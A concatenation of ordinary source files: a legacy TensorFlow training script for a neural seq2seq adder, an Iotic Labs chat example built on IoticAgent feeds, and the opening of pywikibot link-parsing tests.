    FLAGS.test_stack_size = (test_stack_size if FLAGS.test_stack_size == -1
                             else FLAGS.test_stack_size)
    print('--')
    print(' train_seq_len', train_seq_len)
    print(' test_seq_len', test_seq_len)
    print('--')
    print_flags(FLAGS)
    print('-' * 20)
    d4_params = d4InitParams(stack_size=FLAGS.train_stack_size,
                             value_size=value_size,
                             batch_size=FLAGS.batch_size,
                             min_return_width=FLAGS.min_return_width,
                             init_weight_stddev=FLAGS.init_weight_stddev
                             )
    train_params = TrainParams(train=True,
                               learning_rate=FLAGS.learning_rate,
                               num_steps=FLAGS.train_num_steps,
                               max_grad_norm=FLAGS.max_grad_norm,
                               grad_noise_eta=FLAGS.grad_noise_eta,
                               grad_noise_gamma=FLAGS.grad_noise_gamma
                               )
    test_params = TestParams(num_steps=FLAGS.test_num_steps,
                             stack_size=FLAGS.test_stack_size
                             )
    model = NAMSeq2Seq(sketch, d4_params, train_params, test_params,
                       debug=False,
                       adjust_min_return_width=True,
                       argmax_pointers=True,
                       argmax_stacks=True,
                       )
    model.build_graph()
    # with tf.Session() as sess:
    #     model.load_model(sess, "./tmp/add/checkpoints/{0}/".format(FLAGS.id))
    #     print('tst')
    #     # dataset_test = load_single_dataset('./data/add/{0}/test.txt'.format(FLAGS.id))
    #     def num_steps(x):
    #         return x * 8 + 6
    #
    #     accuracy, partial_accuracy = model.run_eval_step(
    #         sess, dataset_test, num_steps(dataset_test.input_seq[:, -1]. max()))
    #     print("{0}\t{1}\t{2}".format('test', accuracy, partial_accuracy))
    #
    #     exit(0)
    # where to save checkpoints for test set calculation
    directory_save = "./tmp/add/checkpoints/{0}/".format(FLAGS.id)
    # directory_save needs to exist
    import os
    if not os.path.exists(directory_save):
        os.makedirs(directory_save)
    best = 0.0
    with tf.Session() as sess:
        # NOTE(review): tf.train.SummaryWriter / tf.initialize_all_variables
        # are TF 0.x-era APIs; this script targets an old TensorFlow.
        summary_writer = tf.train.SummaryWriter(SUMMARY_LOG_DIR + "/" + FLAGS.id,
                                                tf.get_default_graph())
        sess.run(tf.initialize_all_variables())
        # run max_epochs times
        print("epoch\titer\tloss\taccuracy\tpartial accuracy")
        stop_early = False  # NOTE(review): never set to True below
        epoch = 0
        while epoch < FLAGS.max_epochs and (not stop_early):
            epoch += 1
            total_loss = 0.0
            for i in range(train_batcher._batch_number):
                batch = train_batcher.next_batch()
                _, loss, summaries, global_step = model.run_train_step(sess, batch, epoch)
                summary_writer.add_summary(summaries, global_step)
                total_loss += loss
            # NOTE(review): assumes every batch is full-sized; a short final
            # batch would skew this average slightly.
            loss_per_epoch = total_loss / (train_batcher._batch_number * train_batcher._batch_size)
            print("train\t{0}\tl:{1}\t\t".format(epoch, loss_per_epoch))
            if epoch % FLAGS.eval_every == 0:
                accuracy, partial_accuracy = model.run_eval_step(sess, dataset_dev, dev_num_steps)
                print("dev\t{0}\ta:{1}\tpa:{2}".format(epoch, accuracy, partial_accuracy))
                if partial_accuracy > best:
                    # Checkpoint only on a dev partial-accuracy improvement.
                    model.save_model(sess, directory_save + "model.checkpoint",
                                     global_step=global_step)
                    best = partial_accuracy
                if partial_accuracy == 1.0:
                    # Perfect dev accuracy: report test once and terminate.
                    _acc, _p_acc = model.run_eval_step(sess, dataset_test, test_num_steps)
                    print("test\t{0}\ta:{1}\tpa:{2}".format(epoch, _acc, _p_acc))
                    exit(0)
                # accuracy, partial_accuracy = model.run_eval_step(
                #     sess, datasets.test, test_stack_size)
                # print("test {0}\t{1}\t{2}\t{3}".format(epoch, 'x', accuracy, partial_accuracy))
                summary_acc = tf.Summary(
                    value=[tf.Summary.Value(tag="accuracy/accuracy", simple_value=accuracy)])
                summary_part_acc = tf.Summary(
                    value=[tf.Summary.Value(tag="accuracy/partial_accuracy",
                                            simple_value=partial_accuracy)])
                summary_writer.add_summary(summary_acc, global_step)
                summary_writer.add_summary(summary_part_acc, global_step)
        summary_writer.flush()
if __name__ == "__main__":
    tf.app.run()  # parses flags, then invokes main(_)
|
<filename>experiments/add/add.py<gh_stars>10-100
from collections import namedtuple
import numpy as np
import tensorflow as tf
from experiments.nam_seq2seq import NAMSeq2Seq
from experiments.data import load_data, DatasetBatcher
# logging.basicConfig(level=logging.DEBUG)
# NOTE(review): threshold=np.nan is rejected by modern NumPy (use
# sys.maxsize); it matched the NumPy this TF-0.x-era script targeted.
np.set_printoptions(linewidth=20000, precision=2, suppress=True, threshold=np.nan)
# num_steps = seq_length * 6 + 6
# stack_size = seq_length * 2 + 10
#
# seq_len = 1
# num_steps = 12
# stack_size = 12
# seq_length = 3
# num_steps = 24
# stack_size = 16
# seq_length = 10
# num_steps = 66
# stack_size = 30
SUMMARY_LOG_DIR = "./tmp/add/summaries"
# choose add - learning rate 0.05
# Command-line flags; -1 for the step/stack sizes means "derive from data"
# (see main()).
tf.app.flags.DEFINE_integer("batch_size", 128, "Batch size")
tf.app.flags.DEFINE_float("learning_rate", 0.01, "Learning rate")
tf.app.flags.DEFINE_integer("train_num_steps", -1, "Training phase - number of steps")
tf.app.flags.DEFINE_integer("train_stack_size", -1, "Training phase - stack size")
tf.app.flags.DEFINE_integer("test_num_steps", -1, "Testing phase - number of steps")
tf.app.flags.DEFINE_integer("test_stack_size", -1, "Testing phase - stack size")
tf.app.flags.DEFINE_integer("min_return_width", 5, "Minimum return width")
tf.app.flags.DEFINE_integer("eval_every", 5, "Evaluate every n-th step")
tf.app.flags.DEFINE_integer("max_epochs", 1000, "Maximum number of epochs")
tf.app.flags.DEFINE_string("id", "x", "unique id for summary purposes")
tf.app.flags.DEFINE_float("init_weight_stddev", 0.1, "Standard deviation for initial weights")
tf.app.flags.DEFINE_float("max_grad_norm", 1.0, "Clip gradients to this norm.")
tf.app.flags.DEFINE_float("grad_noise_eta", 0.01, "Gradient noise scale.")
tf.app.flags.DEFINE_float("grad_noise_gamma", 0.55, "Gradient noise gamma.")
tf.app.flags.DEFINE_string("dataset",
                           "data/add/train_len/train1_test4",
                           "unique id for summary purposes")
tf.app.flags.DEFINE_string("sketch", "adder_choose", "sketch")
tf.app.flags.DEFINE_boolean("save_summary", True, "Save summary files.")
def print_flags(flags):
    """Dump every registered tf.app flag name/value (for run reproducibility)."""
    print("Flag values")
    for k, v in flags.__dict__['__flags'].items():
        print(' ', k, ':', v)
FLAGS = tf.app.flags.FLAGS
# Immutable parameter bundles handed to NAMSeq2Seq (see main()).
d4InitParams = namedtuple(
    "d4InitParams", "stack_size value_size batch_size min_return_width init_weight_stddev")
TrainParams = namedtuple(
    "TrainParams", "train learning_rate num_steps max_grad_norm grad_noise_eta grad_noise_gamma")
TestParams = namedtuple("TestParams", "stack_size num_steps")
def main(_):
    """Train the NAM seq2seq adder sketch; checkpoint on dev improvement and
    report test accuracy once dev partial accuracy reaches 1.0."""
    dataset_path = FLAGS.dataset
    datasets = load_data(dataset_path)
    print('dataset path:', dataset_path)

    def load_scaffold_from_file(filename):
        # Read the d4 sketch source verbatim.
        with open(filename, "r") as f:
            scaffold = f.read()
        return scaffold
    sketch = load_scaffold_from_file(FLAGS.sketch)
    # calculate value_size automatically
    # (+2 leaves headroom above the largest symbol seen in any split)
    value_size = max(datasets.train.input_seq.max(), datasets.train.target_seq.max(),
                     datasets.dev.input_seq.max(), datasets.dev.target_seq.max(),
                     datasets.test.input_seq.max(), datasets.test.target_seq.max(),
                     datasets.debug.input_seq.max(), datasets.debug.target_seq.max()) + 2
    print('value_size', value_size)
    dataset_train = datasets.train
    dataset_dev = datasets.dev
    dataset_test = datasets.test
    train_batcher = DatasetBatcher(dataset_train, FLAGS.batch_size)
    # The last column of input_seq appears to carry the sequence length --
    # TODO(review): confirm against the data loader.
    train_seq_len = dataset_train.input_seq[:, -1].max()
    test_seq_len = dataset_test.input_seq[:, -1].max()
    dev_seq_len = dataset_dev.input_seq[:, -1].max()
    # Heuristic budgets: machine steps and stack depth grow linearly with
    # the longest sequence in each split.
    train_num_steps = train_seq_len * 8 + 6
    test_num_steps = test_seq_len * 8 + 6
    dev_num_steps = dev_seq_len * 8 + 6
    train_stack_size = train_seq_len * 3 + 10
    test_stack_size = test_seq_len * 3 + 10
    # -1 means "derive from the data"; an explicit flag value wins.
    FLAGS.train_num_steps = (train_num_steps if FLAGS.train_num_steps == -1
                             else FLAGS.train_num_steps)
    FLAGS.train_stack_size = (train_stack_size if FLAGS.train_stack_size == -1
                              else FLAGS.train_stack_size)
    FLAGS.test_num_steps = (test_num_steps if FLAGS.test_num_steps == -1
                            else FLAGS.test_num_steps)
    FLAGS.test_stack_size = (test_stack_size if FLAGS.test_stack_size == -1
                             else FLAGS.test_stack_size)
    print('--')
    print(' train_seq_len', train_seq_len)
    print(' test_seq_len', test_seq_len)
    print('--')
    print_flags(FLAGS)
    print('-' * 20)
    d4_params = d4InitParams(stack_size=FLAGS.train_stack_size,
                             value_size=value_size,
                             batch_size=FLAGS.batch_size,
                             min_return_width=FLAGS.min_return_width,
                             init_weight_stddev=FLAGS.init_weight_stddev
                             )
    train_params = TrainParams(train=True,
                               learning_rate=FLAGS.learning_rate,
                               num_steps=FLAGS.train_num_steps,
                               max_grad_norm=FLAGS.max_grad_norm,
                               grad_noise_eta=FLAGS.grad_noise_eta,
                               grad_noise_gamma=FLAGS.grad_noise_gamma
                               )
    test_params = TestParams(num_steps=FLAGS.test_num_steps,
                             stack_size=FLAGS.test_stack_size
                             )
    model = NAMSeq2Seq(sketch, d4_params, train_params, test_params,
                       debug=False,
                       adjust_min_return_width=True,
                       argmax_pointers=True,
                       argmax_stacks=True,
                       )
    model.build_graph()
    # with tf.Session() as sess:
    #     model.load_model(sess, "./tmp/add/checkpoints/{0}/".format(FLAGS.id))
    #     print('tst')
    #     # dataset_test = load_single_dataset('./data/add/{0}/test.txt'.format(FLAGS.id))
    #     def num_steps(x):
    #         return x * 8 + 6
    #
    #     accuracy, partial_accuracy = model.run_eval_step(
    #         sess, dataset_test, num_steps(dataset_test.input_seq[:, -1]. max()))
    #     print("{0}\t{1}\t{2}".format('test', accuracy, partial_accuracy))
    #
    #     exit(0)
    # where to save checkpoints for test set calculation
    directory_save = "./tmp/add/checkpoints/{0}/".format(FLAGS.id)
    # directory_save needs to exist
    import os
    if not os.path.exists(directory_save):
        os.makedirs(directory_save)
    best = 0.0
    with tf.Session() as sess:
        # NOTE(review): tf.train.SummaryWriter / tf.initialize_all_variables
        # are TF 0.x-era APIs; this script targets an old TensorFlow.
        summary_writer = tf.train.SummaryWriter(SUMMARY_LOG_DIR + "/" + FLAGS.id,
                                                tf.get_default_graph())
        sess.run(tf.initialize_all_variables())
        # run max_epochs times
        print("epoch\titer\tloss\taccuracy\tpartial accuracy")
        stop_early = False  # NOTE(review): never set to True below
        epoch = 0
        while epoch < FLAGS.max_epochs and (not stop_early):
            epoch += 1
            total_loss = 0.0
            for i in range(train_batcher._batch_number):
                batch = train_batcher.next_batch()
                _, loss, summaries, global_step = model.run_train_step(sess, batch, epoch)
                summary_writer.add_summary(summaries, global_step)
                total_loss += loss
            # NOTE(review): assumes every batch is full-sized; a short final
            # batch would skew this average slightly.
            loss_per_epoch = total_loss / (train_batcher._batch_number * train_batcher._batch_size)
            print("train\t{0}\tl:{1}\t\t".format(epoch, loss_per_epoch))
            if epoch % FLAGS.eval_every == 0:
                accuracy, partial_accuracy = model.run_eval_step(sess, dataset_dev, dev_num_steps)
                print("dev\t{0}\ta:{1}\tpa:{2}".format(epoch, accuracy, partial_accuracy))
                if partial_accuracy > best:
                    # Checkpoint only on a dev partial-accuracy improvement.
                    model.save_model(sess, directory_save + "model.checkpoint",
                                     global_step=global_step)
                    best = partial_accuracy
                if partial_accuracy == 1.0:
                    # Perfect dev accuracy: report test once and terminate.
                    _acc, _p_acc = model.run_eval_step(sess, dataset_test, test_num_steps)
                    print("test\t{0}\ta:{1}\tpa:{2}".format(epoch, _acc, _p_acc))
                    exit(0)
                # accuracy, partial_accuracy = model.run_eval_step(
                #     sess, datasets.test, test_stack_size)
                # print("test {0}\t{1}\t{2}\t{3}".format(epoch, 'x', accuracy, partial_accuracy))
                summary_acc = tf.Summary(
                    value=[tf.Summary.Value(tag="accuracy/accuracy", simple_value=accuracy)])
                summary_part_acc = tf.Summary(
                    value=[tf.Summary.Value(tag="accuracy/partial_accuracy",
                                            simple_value=partial_accuracy)])
                summary_writer.add_summary(summary_acc, global_step)
                summary_writer.add_summary(summary_part_acc, global_step)
        summary_writer.flush()
if __name__ == "__main__":
tf.app.run()
|
en
| 0.381161
|
# logging.basicConfig(level=logging.DEBUG) # num_steps = seq_length * 6 + 6 # stack_size = seq_length * 2 + 10 # # seq_len = 1 # num_steps = 12 # stack_size = 12 # seq_length = 3 # num_steps = 24 # stack_size = 16 # seq_length = 10 # num_steps = 66 # stack_size = 30 # choose add - learning rate 0.05 # calculate value_size automatically # with tf.Session() as sess: # model.load_model(sess, "./tmp/add/checkpoints/{0}/".format(FLAGS.id)) # print('tst') # # dataset_test = load_single_dataset('./data/add/{0}/test.txt'.format(FLAGS.id)) # def num_steps(x): # return x * 8 + 6 # # accuracy, partial_accuracy = model.run_eval_step( # sess, dataset_test, num_steps(dataset_test.input_seq[:, -1]. max())) # print("{0}\t{1}\t{2}".format('test', accuracy, partial_accuracy)) # # exit(0) # where to save checkpoints for test set calculation # directory_save needs to exist # run max_epochs times # accuracy, partial_accuracy = model.run_eval_step( # sess, datasets.test, test_stack_size) # print("test {0}\t{1}\t{2}\t{3}".format(epoch, 'x', accuracy, partial_accuracy))
| 2.429155
| 2
|
iotic_chat/main.py
|
aniknarayan/iotic_work
| 0
|
6627560
|
<filename>iotic_chat/main.py
# Copyright (c) 2017 Iotic Labs Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://github.com/Iotic-Labs/py-application-examples/blob/master/LICENSE
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# PYTHON2 COMPATIBILITY -----------------------------------------------------------------------------------------------
from __future__ import unicode_literals, print_function # pylint: disable=unused-import
# LOGGING -------------------------------------------------------------------------------------------------------------
# Logging set to only CRITICAL messages by default. To see more, use logging.INFO, or to see loads, logging.DEBUG
import logging
logging.basicConfig(format='%(asctime)s,%(msecs)03d %(levelname)s [%(name)s] {%(threadName)s} %(message)s',
level=logging.CRITICAL)
# IMPORTS -------------------------------------------------------------------------------------------------------------
import sys
from functools import partial
# IOTIC AGENT IMPORTS -------------------------------------------------------------------------------------------------
from IoticAgent import IOT
from IoticAgent import Datatypes
# THING SETUP -----------------------------------------------------------------------------------------------
# Adds basic chat tags to the new Thing
def add_tags(my_thing):
    """Replace any existing tags on *my_thing* with the chat tag set."""
    # Drop whatever tags the thing currently carries (English tag list).
    existing = my_thing.list_tag()
    if any(existing):
        my_thing.delete_tag(existing['en'])
    # Attach the tag that identifies this thing as a chat participant.
    my_thing.create_tag(['messenger'])
# Adds basic metadata to the new Thing
def add_metadata_information(thing_meta):
    """Write the human-readable label and description onto the thing metadata."""
    thing_meta.set_label('iotic_communicator')
    thing_meta.set_description('basic thing to chat with other thing in Iotic Space')
# Initialize a new thing assigned to the Agent
def setup_thing(client, name):
    """Create (or fetch) the agent's thing *name*, tag it, add metadata and make it public.

    Returns the ready-to-use thing object.
    """
    print("Connecting to your thing", sep=' ', end=' ... ')
    sys.stdout.flush()
    # 1- Get/Create a thing with the given name
    my_thing = client.create_thing(name)
    # 2- Add tags so other chat instances can find this thing by search
    add_tags(my_thing)
    # 3- Add metadata (label + description) to the thing
    with my_thing.get_meta() as meta_thing:
        add_metadata_information(meta_thing)
    # 4- Make the thing publicly visible in Iotic Space
    my_thing.set_public()
    return my_thing
# Setups the feed for share information with others
def setup_thing_feed(my_thing):
    """Create the 'message_data' feed on *my_thing* and declare its value schema.

    Each shared message carries two string values: 'user' and 'message'.
    Returns the feed object.
    """
    # 1-Get feed from thing
    my_feed = my_thing.create_feed('message_data')
    # 2-Put metadata information
    with my_feed.get_meta() as meta_feed:
        meta_feed.set_label('Message data')
        meta_feed.set_description('data sended in the messages')
    # 3-Create skeleton structure (value schema used by get_template/share)
    my_feed.create_value('user', Datatypes.STRING, lang='en', description="Name of the user")
    my_feed.create_value('message', Datatypes.STRING, lang='en', description="Message sent by the user")
    return my_feed
# Attachs a callback function to each feed
def connect_subscriptions(client, my_thing, callback_function):
    """Search for other chat things sharing our tags and follow their feeds.

    Every matching remote feed is wired to *callback_function*, which is
    invoked each time that feed shares data.
    """
    # Search Iotic Space using our own tags as the query text, so we find
    # other things created by this same chat application.
    my_thing_tags = my_thing.list_tag()
    string_tags = ' '.join(my_thing_tags['en'])
    iotic_chat_things = client.search_reduced(text=string_tags)
    # Remove our own thing from the search result if it shows up there,
    # otherwise we would subscribe to ourselves.
    if my_thing.guid in iotic_chat_things:
        del iotic_chat_things[my_thing.guid]
    print("Connecting subscriptions")
    sys.stdout.flush()
    # Get global Point ID (gpid) from this information and wire up the follow to the callback
    for key in iotic_chat_things:
        for feed_guid, feed_type in iotic_chat_things[key].items():
            if feed_type == 'Feed':
                my_thing.follow(feed_guid, None, callback_parsed=callback_function)
# This callback is going to be called everytime we recieve data
def follow_feed_callback(data):
    """Print an incoming chat message in '>user: message' form.

    Invoked by the agent every time a followed feed shares data; the
    parsed values carry the 'user' and 'message' fields.
    """
    parsed = data['parsed'].values
    print('>' + parsed.user + ': ' + parsed.message)
# Sends feed data
def share_data(my_feed, my_feed_skeleton):
    """Publish the prepared message skeleton on the feed."""
    my_feed.share(my_feed_skeleton)
# Send disconected message
def share_goodbye_data(my_feed, my_feed_skeleton):
    """Announce that the current user left the chat, then publish it.

    Mutates *my_feed_skeleton* in place: the message becomes the goodbye
    text and the user field is blanked so the line renders as a system
    notice rather than a regular user message.
    """
    # Fix: message previously read "left the the chat" (duplicated word).
    my_feed_skeleton.values.message = my_feed_skeleton.values.user + ' left the chat'
    my_feed_skeleton.values.user = ''
    my_feed.share(my_feed_skeleton)
# This fuction is called when someone is subscribed to your thing
def incoming_subscription_callback(data, client=None):
    """Handle a new subscriber: follow back every feed of every follower.

    Called by the agent when someone subscribes to one of our feeds.
    *data* carries the local ids of our thing ('entityLid') and the feed
    ('lid'); *client* is bound via functools.partial in main().
    """
    print('New user is subscribed')
    # Re-resolve our own thing that received the new subscriber.
    subscribed_thing = client.create_thing(data['entityLid'])
    # The feed of ours that was subscribed to.
    thing_feed = subscribed_thing.create_feed(data['lid'])
    # Gets all the followers, including the new one.
    feed_followers = thing_feed.list_followers()
    for key in feed_followers:
        # Describe each external thing subscribed to us.
        external_thing = client.describe(feed_followers[key])
        # Inspect the points (feeds/controls) that external thing exposes.
        external_thing_points = external_thing['meta']['points']
        for point in external_thing_points:
            if point['type'] == 'Feed':
                # Follow their feed so we see their messages too.
                subscribed_thing.follow(point['guid'], None, callback_parsed=follow_feed_callback)
# MAIN ------------------------------------------------------------------------------------------------------
def main():
    """Run the chat client: connect, wire subscriptions, then loop on stdin.

    Usage: main.py <agent_config_file> <thing_local_name>. Typing '/quit'
    (or Ctrl-C) publishes a goodbye message and exits the loop.
    """
    # Get the main arguments ( Agent and Thing )
    agent_file = sys.argv[1]
    thing_local_name = sys.argv[2]
    print("Connecting to your agent", sep=' ', end=' ... ')
    sys.stdout.flush()
    with IOT.Client(config=agent_file) as client:
        my_thing = setup_thing(client, thing_local_name)
        my_feed = setup_thing_feed(my_thing)
        # Template matching the feed's value schema; reused for every share.
        my_feed_skeleton = my_feed.get_template()
        connect_subscriptions(client, my_thing, follow_feed_callback)
        # Bind the client into the subscription callback so it can be
        # registered with the agent's single-argument callback interface.
        manage_new_subsciptions = partial(incoming_subscription_callback, client=client)
        client.register_callback_subscription(manage_new_subsciptions)
        print("///////////////////////////////")
        print("// Welcome to the Iotic Chat //")
        print("///////////////////////////////")
        print("Write /quit to exit")
        user = input('Type your nickname: ')
        my_feed_skeleton.values.user = user
        # Main input loop: each line typed is shared as a chat message.
        while True:
            try:
                text = input()
                my_feed_skeleton.values.message = text
                print()
                if text != '/quit':
                    share_data(my_feed, my_feed_skeleton)
                else:
                    share_goodbye_data(my_feed, my_feed_skeleton)
                    break
            except KeyboardInterrupt:
                # Ctrl-C also announces the departure before exiting.
                share_goodbye_data(my_feed, my_feed_skeleton)
                break
# # RUN --------------------------------------------------------------------------------------------------
if __name__ == '__main__':
main()
# # END --------------------------------------------------------------------------------------------------
|
<filename>iotic_chat/main.py
# Copyright (c) 2017 Iotic Labs Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://github.com/Iotic-Labs/py-application-examples/blob/master/LICENSE
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# PYTHON2 COMPATIBILITY -----------------------------------------------------------------------------------------------
from __future__ import unicode_literals, print_function # pylint: disable=unused-import
# LOGGING -------------------------------------------------------------------------------------------------------------
# Logging set to only CRITICAL messages by default. To see more, use logging.INFO, or to see loads, logging.DEBUG
import logging
logging.basicConfig(format='%(asctime)s,%(msecs)03d %(levelname)s [%(name)s] {%(threadName)s} %(message)s',
level=logging.CRITICAL)
# IMPORTS -------------------------------------------------------------------------------------------------------------
import sys
from functools import partial
# IOTIC AGENT IMPORTS -------------------------------------------------------------------------------------------------
from IoticAgent import IOT
from IoticAgent import Datatypes
# THING SETUP -----------------------------------------------------------------------------------------------
# Adds basic chat tags to the new Thing
def add_tags(my_thing):
# Delete thing's tags
my_thing_tags = my_thing.list_tag()
if any(my_thing_tags):
my_thing.delete_tag(my_thing_tags['en'])
# Add new tags
tags = ['messenger']
my_thing.create_tag(tags)
# Adds basic metadata to the new Thing
def add_metadata_information(thing_meta):
# Thing visible name in Iotic Space
thing_meta.set_label('iotic_communicator')
# Thing description
thing_meta.set_description('basic thing to chat with other thing in Iotic Space')
# Initialize a new thing assigned to the Agent
def setup_thing(client, name):
print("Connecting to your thing", sep=' ', end=' ... ')
sys.stdout.flush()
# 1- Get/Create a thing with the given name
my_thing = client.create_thing(name)
# 2-Add tags for searching
add_tags(my_thing)
# 3-Add metada to the thing
with my_thing.get_meta() as meta_thing:
add_metadata_information(meta_thing)
# 4-Makes the thing visible
my_thing.set_public()
return my_thing
# Setups the feed for share information with others
def setup_thing_feed(my_thing):
# 1-Get feed from thing
my_feed = my_thing.create_feed('message_data')
# 2-Put metadata information
with my_feed.get_meta() as meta_feed:
meta_feed.set_label('Message data')
meta_feed.set_description('data sended in the messages')
# 3-Create skeleton structure
my_feed.create_value('user', Datatypes.STRING, lang='en', description="Name of the user")
my_feed.create_value('message', Datatypes.STRING, lang='en', description="Message sent by the user")
return my_feed
# Attachs a callback function to each feed
def connect_subscriptions(client, my_thing, callback_function):
# Get tags to search other thing with same tags
my_thing_tags = my_thing.list_tag()
string_tags = ' '.join(my_thing_tags['en'])
iotic_chat_things = client.search_reduced(text=string_tags)
# Delete our thing from the search result if exists
if my_thing.guid in iotic_chat_things:
del iotic_chat_things[my_thing.guid]
print("Connecting subscriptions")
sys.stdout.flush()
# Get global Point ID (gpid) from this information and wire up the follow to the callback
for key in iotic_chat_things:
for feed_guid, feed_type in iotic_chat_things[key].items():
if feed_type == 'Feed':
my_thing.follow(feed_guid, None, callback_parsed=callback_function)
# This callback is going to be called everytime we recieve data
def follow_feed_callback(data):
values = data['parsed'].values
text = '>' + values.user + ': ' + values.message
print(text)
# Sends feed data
def share_data(my_feed, my_feed_skeleton):
my_feed.share(my_feed_skeleton)
# Send disconected message
def share_goodbye_data(my_feed, my_feed_skeleton):
    """Announce that the current user left the chat, then publish it.

    Mutates *my_feed_skeleton* in place: the message becomes the goodbye
    text and the user field is blanked so the line renders as a system
    notice rather than a regular user message.
    """
    # Fix: message previously read "left the the chat" (duplicated word).
    my_feed_skeleton.values.message = my_feed_skeleton.values.user + ' left the chat'
    my_feed_skeleton.values.user = ''
    my_feed.share(my_feed_skeleton)
# This fuction is called when someone is subscribed to your thing
def incoming_subscription_callback(data, client=None):
print('New user is subscribed')
# Your thing with new subscriptor
subscribed_thing = client.create_thing(data['entityLid'])
# Your feed's thing
thing_feed = subscribed_thing.create_feed(data['lid'])
# Gets all the followers even the new one
feed_followers = thing_feed.list_followers()
for key in feed_followers:
# Get external things subscribed to you
external_thing = client.describe(feed_followers[key])
# Get the points from external thing
external_thing_points = external_thing['meta']['points']
for point in external_thing_points:
if point['type'] == 'Feed':
# Attach callback to see new messages
subscribed_thing.follow(point['guid'], None, callback_parsed=follow_feed_callback)
# MAIN ------------------------------------------------------------------------------------------------------
def main():
# Get the main arguments ( Agent and Thing )
agent_file = sys.argv[1]
thing_local_name = sys.argv[2]
print("Connecting to your agent", sep=' ', end=' ... ')
sys.stdout.flush()
with IOT.Client(config=agent_file) as client:
my_thing = setup_thing(client, thing_local_name)
my_feed = setup_thing_feed(my_thing)
my_feed_skeleton = my_feed.get_template()
connect_subscriptions(client, my_thing, follow_feed_callback)
# Create a new function which recieves a iotic-client
manage_new_subsciptions = partial(incoming_subscription_callback, client=client)
client.register_callback_subscription(manage_new_subsciptions)
print("///////////////////////////////")
print("// Welcome to the Iotic Chat //")
print("///////////////////////////////")
print("Write /quit to exit")
user = input('Type your nickname: ')
my_feed_skeleton.values.user = user
while True:
try:
text = input()
my_feed_skeleton.values.message = text
print()
if text != '/quit':
share_data(my_feed, my_feed_skeleton)
else:
share_goodbye_data(my_feed, my_feed_skeleton)
break
except KeyboardInterrupt:
share_goodbye_data(my_feed, my_feed_skeleton)
break
# # RUN --------------------------------------------------------------------------------------------------
if __name__ == '__main__':
main()
# # END --------------------------------------------------------------------------------------------------
|
en
| 0.594768
|
# Copyright (c) 2017 Iotic Labs Ltd. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://github.com/Iotic-Labs/py-application-examples/blob/master/LICENSE # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # PYTHON2 COMPATIBILITY ----------------------------------------------------------------------------------------------- # pylint: disable=unused-import # LOGGING ------------------------------------------------------------------------------------------------------------- # Logging set to only CRITICAL messages by default. To see more, use logging.INFO, or to see loads, logging.DEBUG # IMPORTS ------------------------------------------------------------------------------------------------------------- # IOTIC AGENT IMPORTS ------------------------------------------------------------------------------------------------- # THING SETUP ----------------------------------------------------------------------------------------------- # Adds basic chat tags to the new Thing # Delete thing's tags # Add new tags # Adds basic metadata to the new Thing # Thing visible name in Iotic Space # Thing description # Initialize a new thing assigned to the Agent # 1- Get/Create a thing with the given name # 2-Add tags for searching # 3-Add metada to the thing # 4-Makes the thing visible # Setups the feed for share information with others # 1-Get feed from thing # 2-Put metadata information # 3-Create skeleton structure # Attachs a callback function to each feed # Get tags to search other thing with same tags # Delete our thing from the search result if exists # Get 
global Point ID (gpid) from this information and wire up the follow to the callback # This callback is going to be called everytime we recieve data # Sends feed data # Send disconected message # This fuction is called when someone is subscribed to your thing # Your thing with new subscriptor # Your feed's thing # Gets all the followers even the new one # Get external things subscribed to you # Get the points from external thing # Attach callback to see new messages # MAIN ------------------------------------------------------------------------------------------------------ # Get the main arguments ( Agent and Thing ) # Create a new function which recieves a iotic-client # # RUN -------------------------------------------------------------------------------------------------- # # END --------------------------------------------------------------------------------------------------
| 1.798307
| 2
|
llcv/models/detectors/__init__.py
|
mtli/llcv
| 1
|
6627561
|
<gh_stars>1-10
from .tv_dets import TVFasterRCNN
|
from .tv_dets import TVFasterRCNN
|
none
| 1
| 1.079502
| 1
|
|
tests/link_tests.py
|
notconfusing/pywikibot-fr-welcome-bot
| 1
|
6627562
|
<gh_stars>1-10
# -*- coding: utf-8 -*-
"""Test Link functionality."""
#
# (C) Pywikibot team, 2014-2019
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, division, unicode_literals
import re
import pywikibot
from pywikibot import config2 as config
from pywikibot import Site
from pywikibot.page import Link, Page, SiteLink
from pywikibot.site import Namespace
from pywikibot.exceptions import Error, InvalidTitle
from tests.aspects import (
unittest,
AlteredDefaultSiteTestCase as LinkTestCase,
DefaultDrySiteTestCase,
WikimediaDefaultSiteTestCase,
TestCase,
)
class TestCreateSeparated(DefaultDrySiteTestCase):
"""Test C{Link.create_separated}."""
def _test_link(self, link, page, section, label):
"""Test the separate contents of the link."""
self.assertIs(link.site, self.site)
self.assertEqual(link.title, page)
if section is None:
self.assertIsNone(link.section)
else:
self.assertEqual(link.section, section)
if label is None:
self.assertIsNone(link.anchor)
else:
self.assertEqual(link.anchor, label)
def test(self):
"""Test combinations of parameters."""
self._test_link(Link.create_separated('Foo', self.site),
'Foo', None, None)
self._test_link(Link.create_separated('Foo', self.site, section='Bar'),
'Foo', 'Bar', None)
self._test_link(Link.create_separated('Foo', self.site, label='Baz'),
'Foo', None, 'Baz')
self._test_link(Link.create_separated('Foo', self.site, section='Bar',
label='Baz'),
'Foo', 'Bar', 'Baz')
# ---- Tests checking if the parser does (not) accept (in)valid titles
class TestLink(DefaultDrySiteTestCase):
"""
Test parsing links with DrySite.
The DrySite is using the builtin namespaces which behaviour is controlled
in this repository so namespace aware tests do work, even when the actual
default site is using completely different namespaces.
"""
def test_valid(self):
"""Test that valid titles are correctly normalized."""
site = self.get_site()
